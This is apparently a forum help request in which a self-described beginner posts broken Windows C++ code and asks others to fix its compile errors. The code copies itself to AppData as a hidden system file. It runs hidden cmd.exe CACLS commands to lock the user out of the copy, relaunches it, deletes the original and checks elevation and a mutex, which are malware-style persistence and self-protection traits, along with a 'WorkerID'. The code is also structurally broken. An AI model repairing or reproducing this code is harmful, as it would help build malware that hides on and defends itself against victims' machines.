i try to compile this code which has no other functions except: after i run > copy itself to other folder/path then delete itself and protect.
I want to learn more about how these things work but I get some errors i can't fix so I need some help to build it :)
here is the list of errors :
Error C1075 '{': no matching token found
Error C2601 'WorkerID': local function definitions are illegal
Error C2601 'SelfDefense': local function definitions are illegal
Error C2601 'IsElevated': local function definitions are illegal
Error C2601 'Delete': local function definitions are illegal
Error C2601 'Copy': local function definitions are illegal
Error C2601 'CheckPath': local function definitions are illegal
Error C2601 'CheckMutex': local function definitions are illegal
i have zero experience with c++ so every attempt to fix this I got more errors.
#define _UNICODE
#include "App.h"
#include "Myresearchconsoleapp/Entry.h"
#include "Myresearchconsoleapp/Process.h"
#include <windows.h>
#include <TCHAR.H>
#include <thread>
#include <sddl.h>
#include <stdio.h>
#include <aclapi.h>
#include <stdlib.h>
#include <Shlwapi.h>
#define STRICT
#pragma comment(linker, "/MERGE:.data=.text")
#pragma comment(linker, "/MERGE:.rdata=.text")
#pragma comment(linker, "/SECTION:.text,EWR")
#define STRLEN(x)(sizeof(x) / sizeof(TCHAR) - 1)
int main(int argc, char **argv) {
using namespace mystudyapp;
Process process(argc, argv);
const Entry::Id entry = Entry::get(process);
if (entry) {
return Entry::exec(process, entry);
}
bool SelfDefense()
{
return TRUE;
}
int Delete(TCHAR* path) {
TCHAR DelCom[MAX_PATH + 1];
wsprintfW(DelCom, L"/c timeout -t 2 && del \"%s\"", path);
ShellExecuteW(0, L"open", L"cmd.exe", DelCom, 0, SW_HIDE);
std::exit(0);
}
int Copy(TCHAR* CopyPth, TCHAR* CruPath, TCHAR* Username) {
STARTUPINFO si;
TCHAR CACLS[1024];
TCHAR CACLS2[1024];
memset(&si, 0, sizeof(si));
si.cb = sizeof(si);
PROCESS_INFORMATION pi;
memset(&pi, 0, sizeof(pi));
CopyFile(CruPath, CopyPth, true);
SetFileAttributes(CopyPth, FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY | FILE_ATTRIBUTE_SYSTEM);
wsprintfW(CACLS, L"/c CACLS \"%s\" /E /P %s:N", CopyPth, Username);
ShellExecuteW(0, L"open", L"cmd.exe", CACLS, 0, SW_HIDE);
wsprintfW(CACLS2, L"/c Echo Y| CACLS \"%s\" /P %s:R", CopyPth, Username);
ShellExecuteW(0, L"open", L"cmd.exe", CACLS2, 0, SW_HIDE);
CreateProcess(NULL, CopyPth, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi);
Delete(CruPath);
}
int CheckMutex() {
WCHAR MUTEX[] = { L"Global\\Mutex01" };
HANDLE hMutex = CreateMutexW(0, 0, MUTEX);
if ((GetLastError() == ERROR_ALREADY_EXISTS) || (GetLastError() == ERROR_ACCESS_DENIED)) {
CloseHandle(hMutex);
std::exit(0);
}
return 0;
}
BOOL IsElevated() {
BOOL fRet = FALSE;
HANDLE hToken = NULL;
if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
TOKEN_ELEVATION Elevation;
DWORD cbSize = sizeof(TOKEN_ELEVATION);
if (GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &cbSize)) {
fRet = Elevation.TokenIsElevated;
}
}
if (hToken) {
CloseHandle(hToken);
}
return fRet;
}
int CheckPath() {
TCHAR Username[256];
TCHAR AppData[1024 + 1];
BOOL Admin = IsElevated();
TCHAR CruPath[MAX_PATH + 1];
ExpandEnvironmentStringsW(L"%USERNAME%", Username, 256);
ExpandEnvironmentStringsW(L"%APPDATA%\\mystudyapp.exe", AppData, 1024);
GetModuleFileName(NULL, CruPath, STRLEN(CruPath));
if (_tcscmp(CruPath, AppData) != 0) {
Copy(AppData, CruPath, Username);
}
else {
CheckMutex();
if (SelfDefense()) {}
return 0;
}
}
char* WorkerID() {
DWORD VolumeSerialNumber = 0;
GetVolumeInformation(L"c:\\", NULL, NULL, &VolumeSerialNumber, NULL, NULL, NULL, NULL);
char procID[20];
sprintf(procID, "%d", VolumeSerialNumber);
return procID;
App app(&process);
return app.exec();
}
